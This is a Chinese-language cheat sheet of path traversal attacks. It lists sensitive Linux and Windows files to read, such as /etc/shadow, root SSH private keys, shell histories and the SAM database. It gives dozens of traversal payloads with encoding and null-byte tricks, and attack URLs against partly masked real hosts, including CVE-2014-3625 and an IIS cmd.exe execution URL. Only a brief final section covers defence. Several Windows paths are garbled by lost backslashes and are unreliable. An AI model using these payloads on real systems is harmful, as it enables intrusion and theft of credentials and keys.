应用安全

文件整理

1. C:WINDOWSsystem32driversetchosts #Win10
2. C:oot.int  #Win7 隐藏文件
3. web.xml  #Java Web项目配置文件  /WEB-INF/web.xml
4. C:Program Filesmysqlmy.ini #Mysql下配置文件
5. /etc/passwd
6. /etc/hosts
7. /etc/group
8. /etc/shadow
9./.htaccess
10./phpinfo.php
11./inc/db.php
12./inc/conn.php
13./Windows/system.ini

Tomcat

1./%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Windows + IIS + asp

1. http://test.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:  #老版本 - IIS CGI文件名解码漏洞
2. http://test.com/show.asp?view=../../../../../Windows/system.ini

路径整理

（1）/../../../../../../../../../../../../../../../../../etc/passwd%00

(2)../../../../../../../../../../../../../../etc/passwd%00

(3)http://xx.xx.com/en/..\..\..\..\..\..\..\..\..\..\/etc/sysconfig/network-scripts/ifcfg-eth1

(4)../../../../../../../../../../etc/passwd

(5)....//....//static/xx.php%00.png

../../../WEB-INF/web.xml

../../../../../../etc/passwd

C:/inetpub/wwwroot/global.asa

C:inetpubwwwrootglobal.asa
C:/boot.ini
C:oot.ini
D:inetpubwwwrootglobal.asa
D:/inetpub/wwwroot/global.asa

（1）xx.php?vt=&cate=/../../../../../../../../../../../../../../../../../etc/passwd%00
(2)http://xx.xx.com/doc/index?md=diagnose_api&app=../../../../../../../../../../../../../../etc/passwd%00

(3)http://xx.xx.com/en/..\..\..\..\..\..\..\..\..\..\/etc/sysconfig/network-scripts/ifcfg-eth1

(4)http://xx.xx.xx.xx/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../etc/passwd

(5)http://xx.xx.com/xx/img.php?s=16,40&n=....//....//static/xx.php%00.png

../../../WEB-INF/web.xml

../../../../../../etc/passwd

C:/inetpub/wwwroot/global.asa

C:inetpubwwwrootglobal.asa
C:/boot.ini
C:oot.ini
D:inetpubwwwrootglobal.asa
D:/inetpub/wwwroot/global.asa

http://2xx.xx.xx.xx:8080/xampp/showcode.php/c:xampp/htdocs/xampp/showcode.php?showcode=1

https://xx.xx.com/static/images/couch-ipad.png../../../../../../../etc/passwd

http://gmu.xx.com/demo/data/tabs/proxy.php?debug=1&key=&file=file:///etc/hosts

http://gmu.xx.com/demo/data/tabs/proxy.php?debug=1&key=&file=file:///etc/passwd

http://xx.xx.com/frame_scc/downLoad?template=../../../../../../../../../etc/passwd

http://xx.12.22.xx/downloadFile.do?fileName=/../../../../../../../etc/passwd

 

CVE-2014-3625

http://218.2.197.XX:18015/spring-css/resources/file:/etc/passwd 

http://218.2.197.XX:18015/spring-css/resources/file:/etc/flag

CVE-2018-1271

路径遍历检测：

/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/known_hosts
/etc/httpd/conf/httpd.conf
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]*(文件标识符)
/proc/mounts
/proc/config.gz/etc/my.cnf
C:Program Filesmysqldatamysqluser.MYD
C:Windowsphp.in
C:Windowsmy.ini
C:oot.int
C:WindowsSystem32inetsrcMetaBase.xml
C:Windows
epairsam
../../ierp/bin/prop.xml

防御

Apache
在httpd.conf文件中找到   Options +Indexes +FollowSymLinks +ExecCGI  并修改成   Options -Indexes+FollowSymLinks +ExecCGI  并保存

Tomcat
修改conf/web.xml，将true 改为false 重启tomcat

IIS
1、在服务器端，打开 控制面板 -->管理工具--> IIS管理器
2、右击默认网站 --> 属性--> 主目录 -->取消“目录浏览”复选框